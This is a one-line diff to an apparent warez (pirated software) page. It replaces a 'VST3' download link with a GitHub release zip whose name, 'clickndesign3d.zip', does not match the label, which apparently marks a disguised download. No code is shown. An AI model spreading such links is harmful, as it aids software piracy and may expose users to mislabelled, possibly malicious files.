--- a/warez.html
+++ b/warez.html
@@ -1,1 +1,1 @@
-<a href="https://file.kiwi/20d00a96#jgMmEoFbXqUkwN5b9q2-Jg,07c00bb1" class="dlink">VST3</a>
+<a href="https://github.com/skizzrkixx-rgb/lycosa/releases/download/iso/clickndesign3d.zip" class="dlink">VST3</a>
